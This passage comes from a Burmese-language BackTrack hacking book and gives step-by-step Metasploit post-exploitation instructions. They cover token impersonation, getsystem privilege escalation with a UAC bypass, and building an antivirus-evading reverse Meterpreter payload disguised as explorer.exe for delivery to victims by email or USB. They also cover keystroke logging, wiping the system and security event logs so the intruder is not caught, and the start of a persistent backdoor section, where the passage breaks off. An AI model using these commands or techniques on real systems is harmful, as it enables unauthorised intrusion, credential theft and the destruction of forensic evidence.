 Internet သိ႕ု မဟုတ္ Intranet Connection


 ထုိးေဖာက္မႈကို စမ္းသပ္ႏိုင္ရန္အတြက္ Target Machine တစ္ခုကိုလည္း လိုအပ္ပါမည္။

Meterpreter shell မွ အေယာင္ေဆာင္တိုကင္မ်ားအေၾကာင္းကို စူးစမ္းႏိုင္ေစရန္ စတင္လုပ္ေဆာင္ရပါ


မည္။ Meterpreter shell ကိုရရိွေစရန္အလို႕ငွါ Host တစ္ခုကို Attack ျပဳလုပ္ရန္အတြက္ Metasploit ကို
အသံုးျပဳရပါမည္။ Mtasploit ကိုအသံုးျပဳျခင္းျဖင့္ Host တစ္ခုကို ၀င္ေရာက္ေစႏိုင္ရန္အတြက္ Chapter 5,
Exploitation တြင္ေဖာ္ျပခဲ့ေသာ အပိုင္းတစ္ခုကို အသံုးျပဳရပါမည္။

၁။ Meterpreter playload တစ္ခုျဖင့္ Metasploit ကိုအသံုးျပဳ၍ Target System တစ္ခုကို ၀င္ေရာက္ခြင့္


ရရိွၿပီးေသာအခါတြင္ ေအာက္ပါပံုအတိုင္း Meterpreter Prompt ကိုေဖာ္ျပရန္ ေစာင့္ဆိုင္းေပးရပါမည္။

၂။ Meterpreter မွ incognito ကိုအသံုးျပဳ၍ အေယာင္ဆင္ျခင္းလုပ္ငန္းကို လုပ္ကိုင္ရပါမည္။ ထိုသို႕


လုပ္ေဆာင္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

use incognito

၃။ Incognito အတြက္ Help ဖိုင္ကိုေတြ႕ျမင္ရေစရန္အတြက္ Help Command ကိုအသံုးျပဳရပါမည္။

help

၄။ အသံုးျပဳႏိုင္ေသာ Option မ်ားအေျမာက္အမ်ားရိွသည္႕အတြက္ေၾကာင့္ သတိျပဳရပါမည္။


မ်က္ပြင့္စာေပ 169
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ ထိ႕ု ေနာက္ System အတြင္းတြင္ လက္ရိွ၀င္ေရာက္ထားေသာ User မ်ား သို႕မဟုတ္ မၾကာခင္အခ်ိန္မွ


အသံုးျပဳခဲ့ေသာ User မ်ားကို စာရင္းလုပ္၍ ရရိွရန္အေရးႀကီးပါသည္။ ထို႕ေၾကာင့္ list_tokens ဟူေသာ
Command ကို -u Option ျဖင့္တဘ
ြဲ က္၍ အသံုးျပဳရပါသည္။

list_tokens –u

၆။ ထို႕ေနာက္ impersonation attack ကိုေမာင္းႏွင္ပါမည္။ အသံုးျပဳမည္႕ Syntax ပံုစံမွာ


impersonate_token [name of the account to impersonate] ျဖစ္ေသာေၾကာင့္ ေအာက္တြင္ေဖာ္ျပ
ထားသည္႕ Command အတိုင္းအသံုးျပဳေပးရပါမည္။

impersonate_token \\test-pc\willie

170 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၇။ အကယ္၍လုပ္ေဆာင္ခ်က္ေအာင္ျမင္ခဲ့လွ်င္ လက္ရိွ စနစ္တြင္ အျခားေသာ User တစ္ေယာက္အေနျဖင့္


အသံုးျပဳေနႏိုင္ၿပီျဖစ္သည္။

ယခုအပိုင္းတြင္ Comromised host တစ္ခုႏွင့္အတူ Meterpreter ကိုအသံုးျပဳ၍ Machine ေပၚတြင္


အျခားေသာ User ၏အေယာင္ေဆာင္ တိုကင္ျဖင့္ထိုးေဖာက္ပံုကိုေဖာ္ျပခဲ့ပါသည္။ အေယာင္ေဆာင္
တိုက္ခိုက္ျခင္း၏ ပန္းတိုင္မွာ User ၏ျဖစ္ႏိုင္ဖြယ္ရာ အျမင့္ဆံုး Level ျဖင့္အသံုးျပဳလို၍ျဖစ္သည္။ ထို႕အျပင္
ယင္း Account ကိအ
ု သံုးျပဳ၍ Network ထဲသို႕ အတြင္းက်က်၀င္ေရာက္ရန္အတြက္လည္းျဖစ္ပါသည္။

Local privilege escalation attack


ယခုအပိုင္းတြင္၀င္ေရာက္ျခင္းရရိွထားေသာ Machine ေပၚမွ User အဆင့္အတန္း (privilege) ျမွင့္တင့္ျခင္း
(escalate) ကိုေလ့လာရပါမည္။ Local အဆင့္ျမွင့္တင္ျခင္းသည္ ထိုးေဖာက္၀င္ေရာက္ထားၿပီးျဖစ္သည္႕
လက္ရိွ System ေပၚတြင္ System သိ႕ု မဟုတ္ Domain User Account မ်ားအျဖစ္ ၀င္ေရာက္ျခင္း ရရိွ
ေအာင္ျပဳလုပ္ျခင္းျဖစ္ပါသည္။

ေဖာ္ျပပါအပိုင္းကိုေလ့လာရန္အတြက္ Internet သိ႕ု မဟုတ္ Intranet Connection တစ္ခုအျပင္


Metasploit Framework အသံုးျပဳထားေသာ ထိုးေဖာက္၀င္ေရာက္ထားၿပီးျဖစ္သည္ ႕ Machine တစ္ခုကို
လည္း လိုအပ္ပါလိမ့္မည္။

Meterpreter shell မွ Local privilege escalation attack ကုိလုပ္ေဆာင္ရန္အတြက္ လိုအပ္ေသာ


လုပ္ေဆာင္ခ်က္မ်ားကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ Meterpreter shell တစ္ခုကို ရရိွႏိုင္ေစရန္အတြက္ Host
တစ္ခုကို Attack ျပဳလုပ္ရန္ Metasploit ကိုအသံုးျပဳရပါမည္။ Metasploit ကိုအသံုးျပဳၿပီး Host တစ္ခုကို
၀င္ေရာက္ႏိုင္ရန္ Charpter 5, Exploitation တြင္ေဖာ္ျပခဲ့ေသာ အပိုင္းတစ္ခုကိုအသံုးျပဳႏိုင္ပါသည္။

၁။ Meterpreter playload ႏွင့္အတူ Metasploit exploit ကိုအသံုးျပဳျခင္းျဖင့္ ထိုးေဖာက္ထားေသာစနစ္ကို


၀င္ခြင့္ရရိွေစရန္အတြက္ Meterpreter prompt ေပၚလာေအာင္ ေစာင့္ဆိုင္းေပးရပါမည္။

မ်က္ပြင့္စာေပ 171
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ getsystem command အတြက္ Help ဖိုင္ကိုၾကည္႕ရွဳႏိုင္ရန္အတြက္ -h option ကိုအသံုးျပဳရပါမည္။

getsystem –h

၃။ ေနာက္ဆံုးအဆင့္အရ getsystem ကိုမည္သည္႕ attribute ကိုမွ်မသံုးပဲ ေမာင္းႏွင္ေပးရပါမည္။

getsystem

မွတ္ရန္။ ။ အကယ္၍ Windows 7 အသံုးျပဳထားေသာ Mahcine ကို ၀င္ေရာက္ႏိုင္ေစရန္ ႀကိဳးပမ္း


ေသာအခါ getsystem Command ကိုအသံုးမျပဳေသးခင္ bypassuac command ကိုအသံုးျပဳရပါမည္။
Bypass UAC သည္ Microsoft User Account Control ကို ေက်ာ္လႊားႏိုင္ေစသည္႕အတြက္ ေအာက္တြင္
ေဖာ္ျပထားသည္႕ Command အတိုင္း အသံုးျပဳရပါမည္။

Run post/windows/escalate/bypassuac

၄။ ထိုအခါ Escalation attack တစ္ခုကို ေအာင္ျမင္စြာလုပ္ေဆာင္ႏိုင္မည္ျဖစ္သည္။

ယခုအပိုင္းတြင္ Meterpreter ကိုအသံုးျပဳ၍ ထိုးေဖာက္ထားေသာ Victim ၏ Machine တြင္ Local


privilege escation attack ကို ျပဳလုပ္ခဲ့ၾကပါသည္။ Meterpreter shell မွအစျပဳ၍ getsystem command
အသံုးျပဳပံုကိုလည္းေဖာ္ျပခဲ့ပါသည္။ အကယ္၍ ေအာင္ျမင္ေသာအခါတြင္ Victim ၏ Machine တြင္
System-level access ကိုရရိွေစမည္ျဖစ္သည္။

Mastering the Social-Engineer Toolkit


(SET)
ယခုအပိုင္းတြင္ Social Engineer Toolkit (SET) ကိုရွင္းျပေပးမည္ျဖစ္သည္။ SET သည္ Framework
တစ္ခုျဖစ္ၿပီး ၄င္းတြင္ လွည္႕ျဖားျခင္း (deception) ကိုအသံုးျပဳ၍ Victim ကိုတိုက္ခိုက္ေစရန္အတြက္ Tool
မ်ားပါ၀င္ပါသည္။ ထို႕ေၾကာင့္ SET သည္ ထိုးေဖာက္မႈ ျပဳလုပ္သူမ်ား၏ လက္နက္တိုက္အျဖစ္ ေခၚဆိုႏိုင္
ေသာ စံ အျဖစ္အလွ်င္အျမန္ေရာက္ရိွလာေစပါသည္။

172 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

SET ကိုစူးစမ္းရန္အတြက္ ေအာက္တြင္ေဖာ္ျပထားေသာအဆင့္မ်ားကို လုပ္ေဆာင္ေပးရပါမည္။

၁။ Terminal Icon ကို Click ႏိွပ္ျခင္းျဖင့္ Terminal Window ကိဖ


ု ြင့္ၿပီးေနာက္ SET ရိွေသာ Folder သိ႕ု
ေအာက္ပါ Command အတိုင္းသြားေရာက္ရပါမည္။

cd /pentest/exploits/set

၂။ ေအာက္တြင္ေဖာ္ျပထားေသာ Command ကိုအသံုးျပဳျခင္းျဖင့္ Application ကိုေမာင္းႏွင္ရမည္။

./set

၃။ SET ကိုပထမဆံုးအႀကိမ္အျဖစ္အသံုးျပဳျခင္းျဖစ္လွ်င္ yes (y) ဟုအေျဖေပးျခင္းျဖင့္ Terms of Service


ကိုလက္ခံေပးရပါမည္။

၄။ ထိုသို႕လက္ခံၿပီးေသာအခါတြင္ SET Menu ကိုေတြ႕ရပါမည္။ SET Menu တြင္ ေအာက္ေဖာ္ျပပါ Option


မ်ားပါ၀င္ပါသည္။

 Social-Engineering Attacks
 Fast-Track Peneration Testing
 Third Party Modules
 Update the Metasploit Framework
မ်က္ပြင့္စာေပ 173
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 Update the Social-Engineer Toolkit


 Update SET Configuration
 Help, Credits, and About
 Exit the Social-Engineer Toolkit တို႕ျဖစ္ၾကသည္။

မွတ္ရန္။ ။Attack တစ္ခုကို မစတင္မီတြင္ ထုတ္လုပ္သူမ်ားထံမွ မၾကာခဏထုတ္ေပးေလ့ရိွေသာ


Update မ်ားကို ရယူျခင္းသည္ အလြန္ေကာင္းမြန္ေသာ အႀကံဥာဏ္တစ္ခုလည္းျဖစ္ပါသည္။

၅။ Social-Engineering Attack ျပဳလုပ္မည္ျဖစ္သည္႕အတြက္ 1 ကိုသာေရြးခ်ယ္ေပးရပါမည္။

၆။ ထိုအခါ Social-Engineering Attack ျဖင့္တိုက္ဆိုင္ေသာ Option မ်ားကိုထပ္မံေဖာ္ျပေပးမည္ျဖစ္ပါ


သည္။ ထိုအထဲမွ Create a Payload and Listener Option ကိုေရြးခ်ယ္မည္ျဖစ္သည္႕အတြက္ 4 ဟု
ရိုက္ထည္႕ေပးရပါမည္။

174 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၇။ ထို႕ေနာက္ Reverse Connect ျပဳလုပ္ရန္ Playload အတြက္ IP Address ကိုေတာင္းဆိုမည္ျဖစ္သည္။


ထိုသို႕ေတာင္းဆိုမႈအတြက္ လက္ရိွအသံုးျပဳစမ္းသပ္ေနေသာ IP Address (မိမိ၏ IP) ကိုရိုက္ထည္႕ေပးရ
ပါမည္။

192.168.10.109

၈။ ၄င္းတို႕၏ ေဖာ္ျပခ်က္မ်ားႏွင့္အတူ Playload ႏွင့္ Listener Option မ်ားအတြက္ Playload မ်ားကို


Generate ျပဳလုပ္ေပးရန္ စာရင္းကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ Windows Reverse_TCP Meterpreter ကို
ေရြးခ်ယ္မည္ျဖစ္သည္႕အတြက္ 2 ကိုေရြးခ်ယ္ေပးရပါမည္။ ၄င္းသည္ Target ႏွင့္ execute Meterpreter
playload မ်ားကို ခ်ိတ္ဆက္ေပးေစပါသည္။

၉။ ထိုအခါ Encode ျပဳလုပ္ရန္ႏွင့္ Antivirus Software package မ်ားကိုေက်ာ္လႊားႏိုင္ရန္ List တစ္ခုကို


ထပ္မံေတြ႕ရပါမည္။ ယခုအေျခအေနတြင္ SET သည္ Backdoored execuatable ကိုေရြးခ်ယ္ရန္
အၾကံျပဳေပးၿပီး ထိုသို႕ Backdoored Execuatble (BEST) Encoding ကိုေရြးခ်ယ္ရန္အတြက္ 16 ဟု
ရိုက္ထည္႕ေပးရပါမည္။

မ်က္ပြင့္စာေပ 175
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

16

၁၀။ ေနာက္ဆံုးတြင္ Listener Port ကို Designate ျပဳလုပ္ရန္ Port တစ္ခုကိုေတာင္းဆိုမည္ျဖစ္သည္။ Port
443 ကိုေရြးခ်ယ္ေပးရမည္ျဖစ္သည္႕အတြက္ 443 ဟု ရိုက္ထည္႕ေပးရပါမည္။

443

၁၁။ Payload လုပ္ငန္းစဥ္ၿပီးဆံုးသြားေသာအခါတြင္ Listener ကိုစတင္ရန္ ေတာင္းဆိုမည္ျဖစ္သည္။

၁၂။ Metasploit သည္ Handler တစ္ခုကို Open လုပ္ယူေၾကာင္းကို သတိျပဳမိပါလိမ့္မည္။

176 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ယခုအပိုင္းတြင္ SET ကိုအသံုးျပဳခဲ့ၾကပါသည္။ SET တြင္ Victim မ်ားကိုလွည္႕စားႏိုင္ရန္ အသံုးျပဳေသာ


Tools မ်ားကို အလြန္ရိုးရွင္းစြာျဖင့္ ထုတ္ေပးႏိုင္ေသာ Menu driven interface တစ္ခုပါရိွပါသည္။ SET ကို
initiate ျပဳလုပ္ျခင္းျဖင့္ SET ကိုစတင္ခဲ့ၿပီး ထို႕ေနာက္တြင္ SEP မွေထာက္ပံ့ေသာ ေမာင္းႏွင္ႏိုင္ေစသည္႕
Exploit မ်ား၏ ေရြးခ်ယ္ႏိုင္ေသာ Option မ်ားကိုလည္း ေရြးခ်ယ္ခဲ့ၾကပါသည္။ Attack ကိုေရြးခ်ယ္ၿပီး
ေနာက္ SET သည္ User မွေမးလာမည္႕ ေမးခြန္းတသီတစ္တန္းကို Metasploit ႏွင့္ ေျဖရွင္းခဲ့ပါသည္။ နိဂံုး
အားျဖင့္ Target Host သို႕ Active Meterpreter Session တစ္ခုျဖင့္ ေထာက္ပံ့ေစႏိုင္ေသာ Execute
ဖိုင္တစ္ခုကိုဖန္တီးခဲ့ပါသည္။

အျပန္အလွန္အားျဖင့္ပင္ SET ကို Desktop မွစတင္ရန္အတြက္ Applications> BackTrack>


Exploitation Tools> Social Engineering Tools> Social Engineering Toolkit> Set ကိုအဆင့္ဆင့္
ေရြးခ်ယ္ေပးရပါမည္။

Delivering your payload to the victim

ွSET ႏွင့္ payload တစ္ခုကိုတည္ေဆာက္ၿပီးေသာအခါ System မ်ားကိုထိုးေဖာက္ရန္အတြက္ အသံုးျပဳသူ


မ်ားထံသို႕ ေပးပိ႕ု ရန္လည္း လိုအပ္ပါမည္။ ထိုသို႕ေပးပိ႕ု ျခင္းကို ေအာက္တြင္ေဖာ္ျပထားေသာ အဆင့္မ်ား
အရလုပ္ေဆာင္ႏိုင္ပါသည္။

မ်က္ပြင့္စာေပ 177
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁။ Set Directory အတြင္းတြင္ msf.exe ဟူေသာဖိုင္တစ္ဖိုင္ေရာက္ရိွေနသည္ကို သတိ္ျပဳမိပါလိမ့္မည္။


ထိုဖိုင္ကို ေပးပိ႕ု သည္႕အခါ Exploit မွန္းသတိျပဳမိမည္႕အခ်က္ကိုေရွာင္ရွားႏိုင္ရန္အတြက္ အမည္ေျပာင္း
ေပးရန္လိုအပ္ပါမည္။ ယခုေနရာတြင္ explorer.exe ဟုေျပာင္းလဲပါမည္။ (စိတ္ႀကိဳက္ႏွစ္သက္သည္႕
မည္ကိုေျပာင္းလဲေပးႏိုင္ပါသည္) ထိုလုပ္ေဆာင္ခ်က္ကို စတင္ရန္အတြက္ Terminal Window ကိုဖြင့္ၿပီး
SET Directory သို႕လမ္းေၾကာင္းျပန္ေျပာင္းေပးရပါမည္။ ထို႕ေၾကာင့္ ေအာက္ပါ Command အတိုင္း
လုပ္ေဆာင္ရပါမည္။

cd /pentest/exploits/set

၂။ ထို႕ေနာက္ Directory အတြင္းမွ ဖိုင္မ်ားကို ၾကည္႕ရွဳရန္အတြက္ Ls Command ကိုအသံုးျပဳရပါမည္။

ls

၃။ ထို႕ေနာက္ explorer.exe ဟုအမည္ေျပာင္းမည္ျဖစ္သည္႕အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳ


ႏိုင္ပါသည္။

mv msf.exe explorer.exe

၄။ ထို႕ေနာက္အမည္ေျပာင္းလဲထားေသာ explorer.exe ကို Zip ဖိုင္ျပဳလုပ္ရပါမည္။ ယခုေနရာတြင္ Zip


ဖိုင္ ျပဳလုပ္ရန္ healthyfiles ကိုအသံုးျပဳပါသည္။ ထိ႕ု ေၾကာင့္ Zip ဖိုင္ျပဳလုပ္ရန္ ေအာက္ပါ Command
ကိုအသံုးျပဳႏိုင္ပါသည္။

zip healthyfiles explorer.exe

178 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ Zip File Archive ရရိွလာေသာအခါ နည္းလမ္းေပါင္းစံုျဖင့္ ထိုးေဖာက္မည္႕ကြန္ပ်ဴတာမ်ားသို႕ ေပးပို႕ႏိုင္


ၿပီျဖစ္သည္။ Email မွေပးပို႕ျခင္း၊ USB Stick အတြင္းသို႕ထည္႕သြင္းေပးျခင္း ႏွင့္ ထိုးေဖာက္မည္႕ကြန္ပ်ဴ
တာတြင္ ျပန္ဖြင့္ျခင္း အစရိွေသာ နည္းလမ္းမ်ားကို အသံုးျပဳႏိုင္ပါသည္။ ထိုသို႕ဖြင့္လစ္ျခင္းျဖင့္
ရည္ရြယ္ထားသည္႕ပန္းတိုင္သို႕အေရာက္လွမ္းႏိုင္ရန္အတြက္အခ်က္အလက္မ်ားကိုရရိွေစမည္ျဖစ္ပါသည္

Collecting Victims’ data


ယခုအပိုင္းတြင္ Metasploit ကိုအသံုးျပဳျခင္းျဖင့္ Victim တစ္ဦးမွ အခ်က္အလက္မ်ားကို ရရိွေစျခင္းကို
ေလ့လာရပါမည္။ ေဖာ္ျပပါ လုပ္ေဆာင္ခ်က္ကိုျပဳလုပ္ႏိုင္ရန္အတြက္ နည္းလမ္းအမ်ိဳးမ်ိဳးရိွေသာ္လည္း
ထိုးေဖာက္ထားေသာ ကြန္ပ်ဴတာမွ အသံုးျပဳသူ၏ ရိုက္ႏိွပ္ထားေသာ Keystrokes မ်ားကိုဖမ္းယူ
(Keyboard မွရိုက္ႏိွပ္ထားေသာ စာသားအားလံုးကို ဖမ္းယူထားျခင္း) လုပ္ေဆာင္ခ်က္ကိုသာလုပ္ေဆာင္
ၾကည္႕မည္ျဖစ္သည္။ ထိုသို႕ေသာ Victim တစ္ဦး၏ အခ်က္အလက္မ်ားရရိွထားျခင္းသည္ ေနာင္တြင္
အသံုးျပဳမည္႕ Exploit မ်ားကိုေရြးခ်ယ္အသံုးျပဳႏုိင္ရန္အတြက္ ပိုမိုေသာ အခ်က္အလက္မ်ားရရိွေစရန္
ခြင့္ျပဳေပးေစပါသည္။ ထိုသို႕ေသာအခ်က္မ်ားေၾကာင့္ ထိုးေဖာက္ထားၿပီးေသာ Host တစ္ခုမွ User တစ္ဦးမွ
ရိုက္ႏိွပ္ထားေသာ Keystorkes ကို ဖမ္းယူၾကည္႕ရွဳ ၾကည္႕ၾကပါမည္။

၁။ Meterpreter payload ျဖင့္ Metasploit exploit ကိုအသံုးျပဳၿပီး Victim တစ္ခုကို ၀င္ေရာက္ျခင္းရရိွထား


ၿပီးျဖစ္လွ်င္ Meterpreter prompt ကိုေတြ႕ျမင္ရမည္ျဖစ္သည္။

၂။ Keylogger ကိုစတင္ႏိုင္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳႏိုင္ပါသည္။

keyscan_start
မ်က္ပြင့္စာေပ 179
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ User ၏ရိုက္ႏိွပ္ထားေသာ Keystorke မ်ားကို Screen တြင္ေတြ႕ျမင္ႏိုင္ေစရန္ Keyscan_dump


ဟူေသာ Command ကိုအသံုးျပဳရပါမည္။

Keyscan_dump

Victim ၏ Machine မွ Data မ်ားကို ရယူရန္အတြက္ နည္းလမ္းေပါင္းေျမာက္မ်ားစြာကိုအသံုးျပဳႏိုင္ပါသည္။


ယခုအပိုင္းတြင္ Metasploit ႏွင့္ Meterpreter Keyscan ကိုအသံုးျပဳၿပီး Keystrokes မ်ားကို Scan
ျပဳလုပ္ျခင္းကို လုပ္ေဆာင္ခဲ့ေသာ္လည္း ထိုသို႕ေသာ data စုေဆာင္းျခင္းကို Wireshark သို႕မဟုတ္
airodump-ng ကိုအသံုးျပဳ၍လည္း လြယ္ကူစြာလုပ္ေဆာင္ႏိုင္ပါသည္။ ထိ႕ု ေၾကာင့္ မိမိျပဳလုပ္လိုေသာ
ရည္ရြယ္ခ်က္ကိုလိုက္၍ အျခားေသာ Tool မ်ားကိုလည္း အသံုးျပဳေစႏိုင္မည္ျဖစ္သည္။

180 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Cleaning up the tracks


ယခုအပိုင္းတြင္ Metasploit ကိုအသံုးျပဳ၍ Tracks မ်ားကို ျပန္ဖ်က္ျခင္း လုပ္ေဆာင္ခ်က္ကိုေလ့လာၾကည္႕
ပါမည္။ ထိ႕ု သို႕ျပန္ဖ်က္ရွင္းလင္းျခင္းလုပ္ငန္းစဥ္သည္အလြန္အေရးႀကီးၿပီး အကယ္၍ ျပန္မဖ်က္မိဘဲ
ထိုးေဖာက္ထားေသာ လမ္းေၾကာင္းအတိုင္းသာ ေျခရာခံလိုက္လာခဲ့ပါက Hack ျပဳလုပ္သူကိုအလြယ္တကူ
ဖမ္းမိသြားမည္ျဖစ္သည္႕အတြက္ ဆိုခဲ့သည္႕အတိုင္း အလြန္အေရးႀကီးသည္ဟု ဆိုရျခင္းျဖစ္သည္။
ကံေကာင္းေစေသာအခ်က္တစ္ခုမွာ Metasploit တြင္ ထိုကဲ့သို႕ ျပန္ဖ်က္ရွင္းလင္းႏိုင္ေသာ နည္းလမ္းတစ္
ခုပါရိွၿပီး Tracks (လမ္းေၾကာင္း) မ်ားကို အလြယ္တကူ ျပန္ဖ်က္ေစႏိုင္ပါသည္။

ထို႕ေၾကာင့္ Meterpreter shell တစ္ခုကိုအသံုးျပဳ၍ Tracks မ်ားကို ရွင္းလင္းမည္႕လုပ္ေဆာင္ခ်က္မ်ားကို


အဆင့္အလုိက္လုပ္ေဆာင္ၾကည္႕ၾကပါမည္။

၁။ Meterpreter shell တစ္ခုရရိွေစရန္အတြက္ Metasploit ကိုအသံုးျပဳ၍ Host ကို Attack ျပဳလုပ္ခဲ့ပါ


သည္။ Chapter 5, Exploitation တြင္ေဖာ္ျပခဲ့ၿပီးျဖစ္သည္႕ Metasploit ကိုအသံုးျပဳ၍ Access တစ္ခုကို
Access ျပဳလုပ္ရန္ အပိုင္းတစ္ခုခုကိုအသံုးျပဳခဲ့ပါသည္။ ထို႕ေနာက္ Victim ကို Access ျပဳလုပ္ခြင့္ရရိွၿပီး
ေသာအခါ ေအာက္ေဖာ္ျပပါပံုအတိုင္း Meterpreter Prompt ကိုေတြ႕ျမင္ရပါမည္။

၂။ ထိ႕ု ေနာက္ log removal process ကိုစတင္ရန္အတြက္ irb (a Ruby Interpreter shell) ကို ေအာက္ပါ
Command ကိုအသံုးျပဳျခင္းျဖင့္ ေမာင္းႏွင္ေပးရပါမည္။

irb

မ်က္ပြင့္စာေပ 181
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ထို႕ေနာက္ Remove ျပဳလုပ္လိုေသာ log မ်ားကို IRB မွေဖာ္ျပေပးမည္ျဖစ္သည္။ ေရြးခ်ယ္ႏိုင္ေသာ


Option အခ်ိဳ႕မွာ ေအာက္ပါအတိုင္းျဖစ္သည္။

log = client.sys.eventlog.open('system')

log = client.sys.eventlog.open('security')

log = client.sys.eventlog.open('application')

log = client.sys.eventlog.open('directory service')

log = client.sys.eventlog.open('dns server')

log = client.sys.eventlog.open('file replication service')

၄။ အထက္ပါအေၾကာင္းတရားမ်ားေၾကာင့္ Log အားလံုးကိုဖ်က္ပါမည္။ ထို႕ေၾကာင့္ တစ္ခ်ိန္တြင္


တစ္ခုစီျဖင့္ ေအာက္ပါ Log မ်ားကို ရိုက္ထည္႕ေပးရပါမည္။

log = client.sys.eventlog.open('system')

log = client.sys.eventlog.open('security')

log = client.sys.eventlog.open('application')

log = client.sys.eventlog.open('directory service')

log = client.sys.eventlog.open('dns server')

log = client.sys.eventlog.open('file replication service')

182 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ ထို႕ေနာက္ အထက္ပါ log file မ်ားကို ေအာက္ပါ Command ကိုအသံုးျပဳျခင္းျဖင့္ ဖ်က္ပစ္ႏိုင္ပါသည္။

log.clear

၆။ ထိုအခါ ဖ်က္ၿပီးျဖစ္ပါမည္။ အထက္တြင္ ေဖာ္ျပထားေသာ Log ဖိုင္မ်ားကိုဖ်က္ရန္ အဆိုပါ Command


မ်ားကို အသံုးျပဳႏိုင္ပါမည္။

Creating a persistent backdoor


ယခုအပိုင္းတြင္ Metasploit Persistence ကိုအသံုးျပဳ၍ Persistent backdoor တစ္ခုကို တည္ေဆာက္
ျခင္းကို ေဖာ္ျပေပးမည္ျဖစ္သည္။ Machine တစ္ခုအတြင္းသို႕ ၀င္ေရာက္ခြင့္ရရိွၿပီးေသာအခါတြင္ ေနာက္
တစ္ႀကိမ္ထိုးေဖာက္စရာမလိုပဲ အသံုးျပဳေစရန္အတြက္ ယခုေဖာ္ျပပါ Persisten backdoor တစ္ခုကုိ
တည္ေဆာက္ၿပီး အခ်ိန္တိုင္းတြင္ ၀င္ေရာက္ေစရန္ ျပဳလုပ္ျခင္းကို လုပ္ေဆာင္ၾကည္႕ပါမည္။ ထို႕ေၾကာင့္
ထိုးေဖာက္မႈျပဳလုပ္ေနခ်ိန္တြင္ ထိုထိုးေဖာက္မႈကို အေႏွာင့္အယွက္ျဖစ္ေစေသာ ထိုးေဖာက္ထားေသာ
ကြန္ပ်ဴတာကို Restart ျပဳလုပ္ေသာအခါမ်ားတြင္ Backdoor ကိုအသံုးျပဳျခင္းျဖင့္ Connection ကိုျပန္လည္
တည္ေဆာက္ေပးၿပီး ေနာက္တစ္ႀကိမ္ ထိုးေဖာက္ Attack ျပဳလုပ္စရာမလိုေအာင္ ျပဳလုပ္ထားႏိုင္ပါသည္။
ထိုကဲ့သို႕ေသာ အျခင္းအရာမ်ားေၾကာင့္ Backdoor သည္အသံုးရတြင္က်ယ္လာၿပီး အသံုးျပဳသူမ်ားႏွင့္
Handy ျဖစ္လာေစပါသည္။

မ်က္ပြင့္စာေပ 183
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Preistent backdoor ကို Install ျပဳလုပ္ျခင္းကိုစတင္လုပ္ေဆာင္ၾကည္႕ၾကပါမည္။ Meterpreter shell ကို


ရရိွေစရန္ Metasploit ကိုအသံုးျပဳ၍ Host ကို Attack ျပဳလုပ္ခဲ့ျခင္းကို Chatper 5, Exploitation တြင္
ေဖာ္ျပခဲ့ၿပီးျဖစ္သည္။

၁။ Meterpreter payload ျဖင့္ Metasploit exploit တစ္ခုကိုအသံုးျပဳ၍ Victim ကိုထိုးေဖာက္ထားၿပီးျဖစ္


သည္႕အတြက္ Meterpreter Prompt ကို ေအာက္တြင္ေဖာ္ျပထားသည္႕အတိုင္း ေတြ႕ရိွရမည္ျဖစ္သည္။

၂။ ထို႕ေနာက္ Backdoor ကို Set up ျပဳလုပ္ရန္ Persistence ကိုေမာင္းႏွင္ေပးရပါမည္။ ထို႕ေၾကာင့္


Persistence help ဖိုင္ကို ဖြင့္ရန္ ေအာက္ပါ Command ကို အသံုးျပဳရပါမည္။

run persistence –h

၃။ Persistence backdoor တြင္ေအာက္တြင္ေဖာ္ျပထားသည္႕အတိုင္း Option မ်ားပါ၀င္ပါသည္။

 -A : ထို Option သည္ Agent ကိုခ်ိတ္ဆက္ရန္အတြက္ ကိုက္ညီေသာ multi/handler listener


